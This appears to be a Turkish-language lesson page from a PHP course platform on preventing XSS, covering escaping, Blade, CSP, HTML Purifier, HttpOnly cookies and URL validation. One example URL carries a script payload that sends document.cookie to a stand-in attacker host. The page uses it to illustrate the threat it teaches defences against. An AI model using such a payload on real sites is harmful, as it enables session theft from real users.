0Pricing
PHP Academy · Ders

Siteler Arası Betik Çalıştırmayı (XSS) Önleme

htmlspecialchars ile çıktıyı kaçışlayın ve İçerik Güvenliği İlkesi uygulayın.

Siteler Arası Betik Çalıştırmayı (XSS) Önleme, CoddyKit'te ücretsiz bir PHP Academy dersidir. Bu, 4 dersinin 1. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, PHP Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. PHP Academy kursu toplamda 4 dersten oluşur.

XSS Nedir?

Siteler Arası Betik Çalıştırma (XSS), bir saldırganın diğer kullanıcıların görüntülediği web sayfalarına kötü amaçlı JavaScript yerleştirmesiyle gerçekleşir. Betik, kurbanın tarayıcısında oturumuna, çerezlerine ve DOM'una erişerek çalışır.

Yansıtılan XSS

Kötü amaçlı yük URL'de veya form parametresindedir ve sunucu tarafından yanıta yansıtılır.

// Malicious URL:
https://example.com/search?q=<script>document.location="https://attacker.com/steal?c="+document.cookie</script>

Depolanan XSS

Yük veritabanına (yorum veya profil alanı gibi) kaydedilir ve o sayfayı görüntüleyen tüm ziyaretçilere gösterilir.

DOM Tabanlı XSS

Güvenlik açığı tamamen istemci tarafındaki JavaScript'tedir; güvenilmeyen veriler innerHTML veya document.write kullanılarak DOM'a güvenli olmayan biçimde eklenir.

htmlspecialchars()

HTML özel karakterlerini zararsız varlıklara dönüştürmek için çıktıyı kaçışlayın. Kullanıcı tarafından sağlanan verileri görüntülemeden önce her zaman kaçışlayın.

<?php
echo htmlspecialchars($userInput, ENT_QUOTES | ENT_HTML5, "UTF-8");
// Converts: < > " ' & into HTML entities

Blade'de Otomatik Kaçışlama

Laravel Blade'in {{ }} söz dizimi, htmlspecialchars işlevini otomatik olarak çağırır. {!! !!} söz dizimini yalnızca güvenilir ve arındırılmış HTML için kullanın.

{{-- Safe: --}}
<h1>{{ $user->name }}</h1>

{{-- Dangerous if $content is untrusted: --}}
<div>{!! $content !!}</div>

İçerik Güvenliği Politikası (CSP)

Bir CSP HTTP üst bilgisi, tarayıcılara yalnızca güvenilir kaynaklardan gelen betikleri çalıştırmalarını bildirir ve sayfaya ulaşsalar bile enjekte edilen satır içi betikleri engeller.

<?php
$response->headers->set("Content-Security-Policy",
    "default-src 'self'; script-src 'self' https://cdn.example.com; object-src 'none'"
);

HTML Girdisini Arındırma

Zengin HTML girdisine izin vermeniz gerekiyorsa (ör. bir WYSIWYG düzenleyicisi), bunu HTML Purifier gibi bir beyaz liste kitaplığıyla veya mews/purifier Laravel paketiyle arındırın.

<?php
// Using HTMLPurifier:
$purifier = new HTMLPurifier();
$cleanHtml = $purifier->purify($dirtyHtml);

X-XSS-Protection Üst Bilgisi

X-XSS-Protection: 1; mode=block üst bilgisini ekleyin (eski tarayıcı desteği). Modern tarayıcılar bunun yerine CSP'ye güvenir.

HttpOnly Çerezleri

Oturum çerezlerinde HttpOnly bayrağını ayarlamak, JavaScript'in bunları okumasını engeller; bir betik enjekte edilse bile XSS tabanlı oturum hırsızlığı riskini azaltır.

URL'leri Doğrulama

Kullanıcı tarafından sağlanan URL'leri doğrulamadan href veya src içine asla yerleştirmeyin. Bir javascript: URI'si XSS çalıştırabilir.

<?php
$url = filter_var($input, FILTER_VALIDATE_URL);
if ($url === false || !in_array(parse_url($url, PHP_URL_SCHEME), ["http", "https"])) {
    $url = "#"; // fallback
}

Özet

Çıktıyı her zaman htmlspecialchars (veya Blade'in {{ }} söz dizimi) ile kaçışlayın. İçerik Güvenliği Politikası ekleyin. HTML girdisini bir beyaz liste kitaplığıyla arındırın. HttpOnly çerezleri kullanın.

Hızlı Kontrol

Hangi PHP işlevi özel HTML karakterlerini varlıklara dönüştürür?

Sıkça Sorulan Sorular

“Siteler Arası Betik Çalıştırmayı (XSS) Önleme” dersi ücretsiz mi?

Evet — “Siteler Arası Betik Çalıştırmayı (XSS) Önleme” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve PHP Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. PHP Academy kursu toplamda 4 dersten oluşur.

“Siteler Arası Betik Çalıştırmayı (XSS) Önleme” dersinde ne öğreneceğim?

htmlspecialchars ile çıktıyı kaçışlayın ve İçerik Güvenliği İlkesi uygulayın. PHP Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

PHP Academy öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te PHP Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 1. dersidir.

“Siteler Arası Betik Çalıştırmayı (XSS) Önleme” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu PHP Academy dersinde kod yazıp çalıştırabilir miyim?

Evet. Her PHP Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. Siteler Arası Betik Çalıştırmayı (XSS) Önleme
  2. SQL Enjeksiyonu ve Parametreli Sorgular
  3. CSRF Koruması
  4. Güvenli Parola Saklama
← PHP Academy Sayfasına Dön